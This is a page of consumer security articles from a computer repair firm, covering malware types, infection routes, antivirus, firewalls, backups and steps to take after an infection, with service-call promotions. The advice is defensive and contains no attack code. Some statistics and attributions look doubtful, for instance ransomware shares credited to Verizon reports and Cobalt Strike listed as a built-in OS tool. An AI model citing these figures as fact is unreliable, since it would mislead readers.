Tag malware

Current Computer Security Landscape

by Billy J Long Guidance, PSA Articles

Article (PSA‑0029)

Why This Matters

Every computer – whether it lives in a home office or a corporate data‑center – is a potential target for criminals seeking money or data. In October 2023 ransomware attacks were 66 % higher than a year earlier (Symantec). This increase shows how lucrative “locking you out” of your own files has become.

What Is Malware?

Malware is malicious software. It is a catch‑all term for any program that harms a computer without the user’s consent. The most common families are listed below.

Common Ways Malware Gets In

  • Infected email attachments
  • Compromised USB or thumb drives
  • Software downloaded from the internet
  • Links in emails, social‑media posts, or chat messages
  • Exploits in legitimate Windows apps and features (the “living‑off‑the‑land” technique)

Typical Malware Types (brief)

  • Viruses – Replicate themselves, slow or cripple a system, and can delete or corrupt files.
  • Spyware / Keyloggers – Record what you type and steal passwords, banking information, etc.
  • Adware – Show unwanted ads; sometimes the ads contain malicious links.
  • Scareware – Pretend to be an antivirus, claim you’re infected, and try to sell fake cleanup software.
  • Ransomware – Encrypt files and demand a ransom to unlock them. Often follows another infection.
  • Botnets – Networks of compromised computers used for spam, DDoS attacks, and other large‑scale threats.

How Attackers Do It Today

Recent research (Symantec) shows the main infection route is no longer massive botnets but exploiting known vulnerabilities in publicly‑facing applications. Attackers increasingly use legitimate Windows tools—remote‑desktop programs, PowerShell scripts, or built‑in admin utilities—to move laterally across a network. Because these tools appear normal, traditional antivirus signatures often miss them.

Why Everyone—Home or Business—Should Care

  • Financial loss – Ransom payments, fraud, or the cost of data recovery.
  • Legal risk – Breached customer data can trigger fines and lawsuits.
  • Reputation damage – Clients lose trust when you can’t protect their information.
  • Personal impact – Family photos, tax records, and other irreplaceable files could disappear.

Basic Steps to Stay Safe (Quick Checklist)

  • ✔️ Keep software up to date. Enable automatic Windows updates and patch third‑party applications.
  • ✔️ Use a reputable antivirus/antispyware suite and keep its definitions current.
  • ✔️ Enable the built‑in Windows firewall (or a trusted third‑party firewall).
  • ✔️ Back up important files regularly – at least weekly, using an external drive or a cloud service with versioning.
  • ✔️ Be skeptical of unexpected emails, links, or attachments. Hover to see the real URL before clicking.
  • ✔️ Limit admin privileges. Use a standard (non‑administrator) account for everyday activities.

If You Suspect an Infection

  • Disconnect the computer from the internet (disable Wi‑Fi/Ethernet).
  • Run a full scan with your security suite.
  • If ransomware messages appear, do NOT pay the ransom. Contact a professional (see phone number below).
  • Restore files from a clean backup if possible.
  • Change passwords for any accounts that may have been compromised.

Need Help Now?

If you think your PC is infected or you have questions about securing your network, call us at (707) 506‑6802 to speak with a technician.

Security Update – 2019

by Billy J Long Guidance, PSA Articles

Article (PSA‑0011)

Why This Year Was a Wake‑Up Call

From the rapid spread of WannaCry and NotPetya ransomware to the explosion of illicit cryptocurrency miners, 2017 reminded us that cyber‑threats can appear from unexpected places. Each year the quantity and variety of threats increase, and attackers continuously develop new ways to infiltrate devices while covering their tracks.

Key Threat Statistics (2017‑2023 Trend Highlights)

  • Ransomware – Over 2 billion records exposed worldwide (2022 Verizon DBIR).
  • Cryptocurrency miners – Symantec reported an 8,500 % increase in miner detections from 2016 to 2017; the trend continues with modern “cryptojacking” scripts on compromised websites.
  • Downloader families – + 92 % new variants reported in 2017; these “dropper” programs fetch additional malware after initial infection.
  • Mac malware – + 80 % new threats in 2017, and the numbers have kept climbing as macOS market share grows.

What Is Malware?

“Malware” = malicious software. It’s an umbrella term for any program that infects a computer without the user’s consent, including viruses, ransomware, spyware, ad‑ware, trojans, and cryptominers.

Common Infection Vectors (non‑exhaustive)

  • Infected email attachments.
  • Compromised USB thumb drives or external disks.
  • Downloads from untrusted websites or pirated software.
  • Malicious links in email, social‑media posts, instant‑message chats.
  • Drive‑by downloads via compromised legitimate‑looking websites (malvertising).

For a full glossary of terms, see our Threat Glossary.

Do You Need to Worry About Malware?

Absolutely. Cyber‑crime targets anyone with an Internet‑connected device—home users, small businesses, and large enterprises alike.

  • Business impact: A breach can expose customer data, trigger legal penalties (GDPR, HIPAA, PCI‑DSS), and damage reputation.
  • Personal impact: Family photos, financial documents, and personal communications can be stolen, encrypted, or deleted.
  • Recent surveys (Verizon 2023) show **≈ 1 in 3 people** reported a personal security incident in the past year.

Basic Protection Checklist (Start Here)

  1. Keep software updated. Enable automatic Windows/macOS updates, and patch third‑party apps as soon as patches appear.
  2. Use reputable antivirus/anti‑malware. Microsoft Defender (Windows 10/11) or a trusted third‑party solution (Bitdefender, Malwarebytes, ESET).
  3. Enable a firewall. Built‑in OS firewall is sufficient for most home users; ensure it’s turned on.
  4. Practice safe browsing. Don’t click unknown links, verify URLs, and avoid downloading from untrusted sites.
  5. Secure email. Use spam filters, enable MFA on email accounts, and never open unexpected attachments.
  6. Back up your data. Follow the 3‑2‑1‑0 rule (three copies, two media types, one off‑site, zero errors).
  7. Enable multi‑factor authentication (MFA) on any cloud service, VPN, and privileged accounts.

What to Do If You Suspect an Infection

  • Disconnect the device from the Internet (disable Wi‑Fi/Ethernet).
  • Run a full scan with an up‑to‑date anti‑malware product.
  • If the scan reports ransomware or a serious threat, isolate the machine and consider professional remediation.
  • Change passwords for any accounts accessed from the infected device (preferably from a clean device).
  • Restore files from a recent, verified backup if they have been encrypted or corrupted.

2025 Update – New Threat Landscape & Mitigations

Since the original 2017‑2023 overview, several important developments have reshaped the threat environment. Below is a concise addendum you can use to keep the article current.

1️⃣ Ransomware‑as‑a‑Service (RaaS) is Mainstream

  • Attack‑as‑a‑service platforms (e.g., LockBit 2.0, Hive, Blackcat) let low‑skill actors launch ransomware attacks for a subscription fee.
  • 2024 Verizon DBIR reported 61 % of data‑breach incidents involved ransomware, and total ransomware payments in 2024 topped **$1.5 billion**.
  • Mitigation: Deploy **endpoint detection & response (EDR)** solutions (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) that can detect malicious behavior before encryption begins; maintain immutable backups (write‑once, read‑many) to thwart ransom demands.

2️⃣ AI‑Generated Phishing & Deepfake Social Engineering

  • Large‑language models are being used to craft hyper‑personalized phishing emails that bypass traditional keyword filters.
  • Deepfake video/audio calls are increasingly used to impersonate executives (“CEO fraud”).
  • Mitigation: Adopt **zero‑trust email verification** (DMARC, SPF, DKIM), train staff with regular simulated phishing campaigns, and enforce MFA for all privileged accounts.

3️⃣ Supply‑Chain & Software‑Update Attacks

  • After the 2020 SolarWinds breach, attackers have focused on compromising software update mechanisms (e.g., recent Octave and EventX incidents in 2025).
  • Mitigation: Verify code signatures, enable **code‑signing integrity checks**, and limit admin rights on update tools.

4️⃣ Cryptojacking Evolution

  • Browser‑based cryptojacking scripts now target **WebAssembly** for higher hash rates, often delivered via compromised ad‑networks.
  • Mobile devices are also being hijacked to mine Monero via malicious apps.
  • Mitigation: Use browser extensions that block crypto‑mining scripts (e.g., uBlock Origin, NoScript), keep browsers and plug‑ins up to date, and run mobile anti‑malware scans.

5️⃣ Rise of “File‑less” Malware & Living‑off‑the‑Land (LotL) Techniques

  • Attackers increasingly leverage legitimate OS utilities (PowerShell, Windows Management Instrumentation, Office macros) to execute payloads without dropping a file on disk.
  • Mitigation: Enable **Windows Defender Exploit Guard** (Attack Surface Reduction rules), enforce **Application Control** (AppLocker or Microsoft Defender Application Control), and limit PowerShell execution policies.

6️⃣ Enhanced Defensive Technologies (2025)

  • Microsoft 365 Defender XDR integrates email, endpoint, identity, and cloud app protection using AI‑driven analytics.
  • Zero‑Trust Network Access (ZTNA) replaces traditional VPNs for many businesses, reducing lateral movement risk.
  • Endpoint platforms now provide **automated ransomware rollback** (e.g., CrowdStrike’s “Rollback” and SentinelOne’s “ActiveEDR”) that can restore files to pre‑infection state without a backup.

7️⃣ Updated Statistics (2025)

  • IDC estimates **5.6 billion** devices will be infected with some form of malware by the end of 2025.
  • 2024 Palo Alto Networks report shows a **28 % increase** in credential‑theft attacks targeting remote‑work setups.
  • Cyber‑insurance premiums have risen an average of **23 %** year‑over‑year, reflecting the growing cost of ransomware and data‑breach remediation.

Need Help Right Now?

If you have questions about current threats, want a security assessment, or need assistance cleaning an infected system, call PSA Computer Services at (707) 506‑6802. We’ll help you protect your data and get you back online safely.

How Antivirus & Antispyware Work

by Billy J Long Guidance, PSA Articles

Article (PSA‑0004)

If a computer is connected to the Internet it is exposed to a constant stream of files, links, and network traffic. An up‑to‑date **antivirus/antispyware** solution provides the first line of defense by:

  • Scanning files in real time as they are downloaded or executed.
  • Running scheduled deep scans of the entire drive or selected folders.
  • Leveraging constantly‑updated threat definitions and heuristic/AI‑based detection.

Key features you should look for (2025)

  • Real‑time protection – automatically blocks malicious code before it runs.
  • Scheduled full‑disk scans – weekly or bi‑weekly deep scans.
  • Cloud‑based AI/behavioral analysis – catches zero‑day threats that signatures haven’t seen yet.
  • Automatic definition updates – at least daily.
  • Low system impact – runs efficiently on modern hardware without excessive RAM or CPU usage.

Built‑In Windows Options (Free)

  • Windows 10/11 – Microsoft Defender (formerly Windows Defender). Integrated, automatically updated, and provides both antivirus and antispyware protection at no extra cost.
  • Windows 7 – Microsoft Security Essentials (no longer supported after Jan 2020). If you are still on Windows 7, upgrade to a supported OS or use a third‑party solution, because Microsoft no longer provides definition updates for Windows 7.

Third‑Party Solutions (When You Need More)

For businesses or users who want additional features (e.g., ransomware‑specific protection, web‑filtering, centralized management), consider reputable vendors such as:

  • Bitdefender GravityZone
  • Kaspersky Endpoint Security
  • SentinelOne
  • Maldetect + ClamAV (for Linux/UNIX environments)

Why One Antivirus Is Enough

Running more than one real‑time AV/antispyware engine on the same machine creates problems:

  1. Resource contention – Each engine consumes RAM and CPU; the system may start paging to disk, drastically slowing performance.
  2. Software conflicts – Two scanners can flag each other as malicious, leading to false positives, constant alerts, or even system instability.
  3. Self‑quarantine – One product may quarantine the other’s core files, corrupting the second product and making it difficult to repair.
  4. Licensing overhead – Multiple subscriptions increase cost and administrative effort.

In short, **one well‑chosen, continuously updated product plus a firewall** gives you comprehensive protection without the downsides.

How to Detect an Infection

  • Frequent pop‑ups, unexpected toolbars, or strange system notifications.
  • New icons, programs, or services appearing without your consent.
  • Home‑page changes, unwanted redirects, or DNS hijacking.
  • System slowdown, frequent freezes, or crashes during routine tasks.
  • Unusual outbound network traffic (check with a network monitor or firewall logs).

Step‑by‑Step Response If You Suspect Malware

  1. Update definitions – Ensure both AV and antispyware engines have the latest signature database.
  2. Run a full system scan – Allow the scan to complete; it may take 30 minutes to several hours depending on data size.
  3. Follow the removal instructions – Quarantine or delete the identified items, then reboot if prompted.
  4. Re‑scan – After the reboot, run another full scan to confirm the system is clean.
  5. Check startup items & scheduled tasks – Use msconfig (Windows) or systemctl (Linux) to verify nothing suspicious is set to launch automatically.
  6. Change passwords – If you suspect credential theft, reset passwords on a clean device, especially for email, banking, and admin accounts.
  7. Restore from backup (if needed) – If the infection cannot be fully removed, revert to a known‑good backup.

When Professional Help Is Needed

If the malware persists after multiple scans, re‑appears after a reboot, or has caused system instability, you should consult a qualified IT service provider. PSA Computer Services offers a **“no‑fix, no‑pay” guarantee** – you only pay for successful remediation.

Best‑Practice Checklist

  • Enable built‑in Windows Defender (or a reputable third‑party solution) with real‑time protection.
  • Keep OS and all applications patched – enable automatic updates.
  • Schedule weekly full scans and daily definition updates.
  • Use a hardware or software firewall with inbound blocking and outbound monitoring.
  • Practice safe browsing: avoid unknown links, verify SSL certificates, and use a reputable browser.
  • Back up critical data using the 3‑2‑1‑0 rule; test restore procedures quarterly.
  • Enable multi‑factor authentication on all cloud accounts.

Bottom Line

No home or business should operate without a modern, regularly updated antivirus/antispyware solution and a firewall. One well‑maintained product, coupled with common‑sense habits (patching, backups, MFA), provides strong protection without the performance penalties and conflicts of running multiple overlapping tools.

Need a Reliable Antivirus Solution or a Clean‑Up?

Call PSA Computer Services at (707) 506‑6228 for a free assessment, installation, or infection remediation. We’ll get you protected quickly and affordably.

Introduction to Malicious Software

by Billy J Long Guidance, PSA Articles

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds, Accellion).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit 2.0, Hive) include “double‑extortion” – stealing data and threatening public release.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Execute malicious code directly in memory using legitimate OS tools (PowerShell, WMI, Cobalt Strike). No files are written to disk, making traditional AV signatures less effective.

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and DNS‑filtering services (e.g., Quad9, Cloudflare DNS‑SEC) add another layer of defense.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Further Reading

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

Security, Is More Better?

by Billy J Long Guidance, PSA Articles

Article (PSA‑0002)

Security requirements vary by how a computer is used. For a quick assessment you can split the environment into two categories:

  • Online (Internet‑connected) devices – need real‑time threat detection and a firewall.
  • Offline (stand‑alone) devices – may need fewer safeguards, but still require some protection if they ever exchange media with other systems.

1️⃣ Online Devices – Core Requirements

Antivirus / Antimalware

A modern, licensed solution that provides both **real‑time** and **scheduled** scanning is essential.

  • Real‑time scanning – Monitors files as they are created, downloaded, or executed and blocks known threats instantly.
  • Scheduled scanning – Performs a deep scan of the entire drive (or selected folders) on a regular basis (daily, weekly, or monthly) to catch dormant or missed malware.
Built‑in options (2025)
  • Windows 10/11 – Microsoft Defender – Free, always‑on, AI‑enhanced, and centrally manageable via Microsoft Endpoint Manager.
  • macOS – Xprotect + Gatekeeper – Native malware detection and notarization checks for downloaded apps.
  • Linux – ClamAV, Sophos Home for Linux, or commercial EDR agents – Useful for servers or workstations that run Linux.
When to consider a third‑party solution

If you need additional features such as ransomware‑specific protection, web‑filtering, or centralized reporting for multiple endpoints, look at reputable vendors like Bitdefender GravityZone, SentinelOne, or ESET Endpoint Security.

Firewall

A firewall controls inbound and outbound traffic based on a set of rules. Two layers are common:

  • Software firewall – Built into the OS (Windows Defender Firewall, macOS Application Firewall, Linux UFW/nftables). It blocks unsolicited inbound connections and can restrict outbound traffic.
  • Hardware firewall – The router or a dedicated appliance (e.g., Ubiquiti EdgeRouter, Cisco Meraki, or a commercial NGFW – Next‑Generation Firewall). It adds network‑level filtering and NAT, keeping the entire LAN hidden from the Internet.

For most home users and small businesses the combination of the OS firewall plus the router’s NAT/packet‑filter is more than adequate.

2️⃣ Offline (Never‑Connected) Devices – What to Consider

If a computer truly never touches the Internet and never receives files from another network, you can forego a full‑time antivirus program. However, keep these points in mind:

  • Even removable media (USB sticks, external HDDs) can carry malware. Scan any media before it is introduced to an offline system.
  • Use a lightweight on‑access scanner (e.g., Windows Defender in “offline scan” mode) for occasional checks.
  • Maintain a strict air‑gap policy: keep the device physically separated and disable any wireless adapters.

Why One Security Suite Is Usually Enough

Running multiple antivirus products on the same machine creates more problems than it solves. The most common issues are:

  1. RAM depletion – Each engine consumes memory. When RAM runs out the OS starts paging to disk, causing severe slow‑downs.
  2. Software conflicts – Two real‑time scanners can flag each other’s activity as malicious, leading to endless alerts and potential system instability.
  3. Quarantine of critical files – One product may mistakenly quarantine the other’s core components, leaving both programs corrupted.
  4. Administrative overhead – Managing multiple licences, updates, and alert streams is time‑consuming and costly.

For the vast majority of users, **one up‑to‑date antivirus/antispyware product plus a properly configured firewall** provides comprehensive protection.

Practical Checklist – Get Secure in Minutes

  • Enable the built‑in OS firewall. Verify that inbound connections are blocked unless you explicitly allow them.
  • Install a reputable antivirus. If you’re on Windows 10/11, make sure Microsoft Defender is turned on and receiving updates.
  • Schedule a weekly full scan. Set the scan for off‑hours to avoid interrupting work.
  • Keep the system patched. Enable automatic OS updates and apply vendor patches for all installed software.
  • Use strong, unique passwords and enable multi‑factor authentication (MFA) on all cloud accounts.
  • Back up your data. Apply the 3‑2‑1‑0 rule (see PSA‑0005) and test restores quarterly.
  • Limit admin privileges. Operate daily tasks as a standard user; reserve Administrator rights for installs and system changes.

When to Upgrade Your Protection

Consider a more advanced solution if any of the following apply:

  • You run a small business with multiple endpoints and need centralized management.
  • Ransomware or phishing attacks are a frequent threat in your industry.
  • You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs.
  • You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls.

Need Professional Help?

If you’re unsure about the right antivirus, firewall configuration, or overall security posture for your home or business, call PSA Computer Services at (707) 506‑6802. We’ll perform a quick health check, recommend a solution that fits your budget, and set everything up so you can work safely.